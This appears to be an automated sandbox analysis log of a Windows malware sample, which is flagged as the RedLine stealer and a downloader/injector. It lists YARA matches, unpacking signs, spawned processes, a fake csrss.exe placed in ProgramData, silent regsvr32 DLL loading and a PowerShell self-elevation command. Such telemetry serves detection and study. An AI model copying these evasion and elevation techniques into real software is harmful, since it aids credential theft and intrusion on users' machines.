                      Source: 0000001D.00000002.1937113796.0000000002985000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 00000006.00000002.1659298227.00000000007AD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: C:\Users\user\AppData\Local\Temp\914D.exe, type: DROPPEDMatched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
                      Source: EE8C.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 6653.dll.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 5A89.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C338.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 4312.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: csrss.exe.8.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: anyburnfree.exe.21.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: IMAP List Mailboxes 65.exe.24.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: syncUpd[1].exe.30.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: nsxAC73.tmp.30.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: classification engineClassification label: mal100.troj.expl.evad.mine.winEXE@158/176@26/35
                      Source: C:\Users\user\AppData\Local\Temp\78A4.exeCode function: 16_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,16_2_00409448
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeCode function: 17_2_004023F2 LoadLibraryA,LookupPrivilegeValueA,AdjustTokenPrivileges,LoadLibraryA,NtShutdownSystem,17_2_004023F2
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_004555B8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,18_2_004555B8
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpCode function: 18_2_00455DE0 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,18_2_00455DE0
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeCode function: 0_2_00552591 CreateToolhelp32Snapshot,Module32First,0_2_00552591
                      Source: C:\Users\user\AppData\Local\Temp\78A4.exeCode function: 16_2_00409BEC FindResourceA,SizeofResource,LoadResource,LockResource,16_2_00409BEC
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\egiibgtJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6374.exeMutant created: \Sessions\1\BaseNamedObjects\jmuZVxzUSQKZJ
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6964:120:WilError_03
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:5892:64:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6668:120:WilError_03
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2000
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7620
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:3804:64:WilError_03
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\5A89.tmpJump to behavior
                      Source: Yara matchFile source: 36.0.BroomSetup.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000024.00000000.1817855025.0000000000401000.00000020.00000001.01000000.00000019.sdmp, type: MEMORY
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe, type: DROPPED
                      Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" "
                      Source: IIBXMzS0zN.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
                      Source: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: IIBXMzS0zN.exeReversingLabs: Detection: 81%
                      Source: unknownProcess created: C:\Users\user\Desktop\IIBXMzS0zN.exe C:\Users\user\Desktop\IIBXMzS0zN.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\egiibgt C:\Users\user\AppData\Roaming\egiibgt
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\5A89.exe C:\Users\user\AppData\Local\Temp\5A89.exe
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeProcess created: C:\Users\user\AppData\Local\Temp\5A89.exe C:\Users\user\AppData\Local\Temp\5A89.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\6056.exe C:\Users\user\AppData\Local\Temp\6056.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\6374.exe C:\Users\user\AppData\Local\Temp\6374.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\6653.dll
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe /s C:\Users\user\AppData\Local\Temp\6653.dll
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\78A4.exe C:\Users\user\AppData\Local\Temp\78A4.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\6374.exe "C:\Users\user\AppData\Local\Temp\6374.exe"
                      Source: C:\Users\user\AppData\Local\Temp\78A4.exeProcess created: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmp "C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmp" /SL5="$801FA,8085089,54272,C:\Users\user\AppData\Local\Temp\78A4.exe"
                      Source: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmpProcess created: C:\Users\user\AppData\Local\Temp\78A4.exe "C:\Users\user\AppData\Local\Temp\78A4.exe" /SPAWNWND=$10490 /NOTIFYWND=$801FA
                      Source: C:\Users\user\AppData\Local\Temp\78A4.exeProcess created: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp "C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp" /SL5="$18004E,8085089,54272,C:\Users\user\AppData\Local\Temp\78A4.exe" /SPAWNWND=$10490 /NOTIFYWND=$801FA
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 7620 -ip 7620
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpProcess created: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe "C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe" -i
                      Source: C:\Users\user\AppData\Local\Temp\6056.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7620 -s 640
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpProcess created: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe "C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe" -s
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\914D.exe C:\Users\user\AppData\Local\Temp\914D.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeProcess created: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe "C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeProcess created: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe "C:\Users\user\AppData\Local\Temp\InstallSetup4.exe"
                      Source: C:\Windows\explorer.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeProcess created: C:\Users\user\AppData\Local\Temp\FourthX.exe "C:\Users\user\AppData\Local\Temp\FourthX.exe"
                      Source: C:\ProgramData\Drivers\csrss.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
                      Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeProcess created: C:\Users\user\AppData\Local\Temp\BroomSetup.exe C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\AD52.exe C:\Users\user\AppData\Local\Temp\AD52.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B68B.exe C:\Users\user\AppData\Local\Temp\B68B.exe
                      Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" "
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2000 -ip 2000
                      Source: C:\Users\user\AppData\Local\Temp\B68B.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2000 -s 356
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\5A89.exe C:\Users\user\AppData\Local\Temp\5A89.exeJump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\6056.exe C:\Users\user\AppData\Local\Temp\6056.exeJump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\6374.exe C:\Users\user\AppData\Local\Temp\6374.exeJump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\6653.dllJump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\78A4.exe C:\Users\user\AppData\Local\Temp\78A4.exeJump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\914D.exe C:\Users\user\AppData\Local\Temp\914D.exeJump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe" Jump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\AD52.exe C:\Users\user\AppData\Local\Temp\AD52.exeJump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B68B.exe C:\Users\user\AppData\Local\Temp\B68B.exeJump to behavior
                      Source: C:\Windows\explorer.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\explorer.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\explorer.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\AD52.exe C:\Users\user\AppData\Local\Temp\AD52.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5A89.exeProcess created: C:\Users\user\AppData\Local\Temp\5A89.exe C:\Users\user\AppData\Local\Temp\5A89.exeJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe /s C:\Users\user\AppData\Local\Temp\6653.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\78A4.exeProcess created: C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmp "C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmp" /SL5="$801FA,8085089,54272,C:\Users\user\AppData\Local\Temp\78A4.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\78A4.exeProcess created: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp "C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp" /SL5="$18004E,8085089,54272,C:\Users\user\AppData\Local\Temp\78A4.exe" /SPAWNWND=$10490 /NOTIFYWND=$801FA
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpProcess created: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe "C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe" -i
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpProcess created: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe "C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe" -s
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 7620 -ip 7620
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7620 -s 640
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2000 -ip 2000
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2000 -s 356
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeProcess created: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe "C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeProcess created: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe "C:\Users\user\AppData\Local\Temp\InstallSetup4.exe"
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeProcess created: C:\Users\user\AppData\Local\Temp\FourthX.exe "C:\Users\user\AppData\Local\Temp\FourthX.exe"
                      Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeProcess created: C:\Users\user\AppData\Local\Temp\BroomSetup.exe C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                      Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeProcess created: unknown unknown
                      Source: C:\ProgramData\Drivers\csrss.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
                      Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs
                      Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" "
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
                      Source: C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmpWindow found: window name: TMainForm
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\AppData\Local\Temp\914D.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                      Data Obfuscation

                      barindex
                      Detected unpacking (changes PE section rights)
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeUnpacked PE file: 0.2.IIBXMzS0zN.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.vufugag:W;.tls:W;.jeyup:W;.rsrc:R; vs .text:EW;
                      Source: C:\Users\user\AppData\Roaming\egiibgtUnpacked PE file: 6.2.egiibgt.400000.1.unpack .text:ER;.rdata:R;.data:W;.vufugag:W;.tls:W;.jeyup:W;.rsrc:R; vs .text:EW;
                      Source: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exeUnpacked PE file: 26.2.anyburnfree.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.cab7:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
                      Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeUnpacked PE file: 29.2.288c47bbc1871b439df19ff4df68f076.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
                      Source: C:\Users\user\AppData\Local\Temp\AD52.exeUnpacked PE file: 37.2.AD52.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.rofi:W;.tls:W;.rehopeb:R;.jidexi:W;.rsrc:R; vs .text:EW;
                      Source: C:\Users\user\AppData\Local\Temp\B68B.exeUnpacked PE file: 38.2.B68B.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.wet:W;.tls:W;.mixifi:R;.civo:W;.rsrc:R; vs .text:EW;
                      Detected unpacking (overwrites its own PE header)
                      Source: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exeUnpacked PE file: 26.2.anyburnfree.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeUnpacked PE file: 29.2.288c47bbc1871b439df19ff4df68f076.exe.400000.0.unpack
                      Suspicious powershell command line found
                      Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs
                      Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs
                      Source: C:\Users\user\Desktop\IIBXMzS0zN.exeCode function: 0_2_004205D0 LoadLibraryW,GetProcAddress,VirtualProtect,0_2_004205D0
                      Source: initial sampleStatic PE information: section where entry point is pointing to: .
                      Source: 6653.dll.2.drStatic PE information: real checksum: 0x0 should be: 0x1baa0b
                      Source: BroomSetup.exe.30.drStatic PE information: real checksum: 0x0 should be: 0x4cbbf8
                      Source: IMAP List Mailboxes 65.exe.24.drStatic PE information: real checksum: 0x0 should be: 0x3bc138
                      Source: 914D.exe.2.drStatic PE information: real checksum: 0x0 should be: 0x8be514
                      Source: anyburnfree.exe.21.drStatic PE information: real checksum: 0x0 should be: 0x3bc138
                      Source: INetC.dll.30.drStatic PE information: real checksum: 0x0 should be: 0x69a0
                      Source: 78A4.tmp.16.drStatic PE information: real checksum: 0x0 should be: 0xad8f2
                      Source: 288c47bbc1871b439df19ff4df68f076.exe.27.drStatic PE information: real checksum: 0x420b8d should be: 0x42c6e2
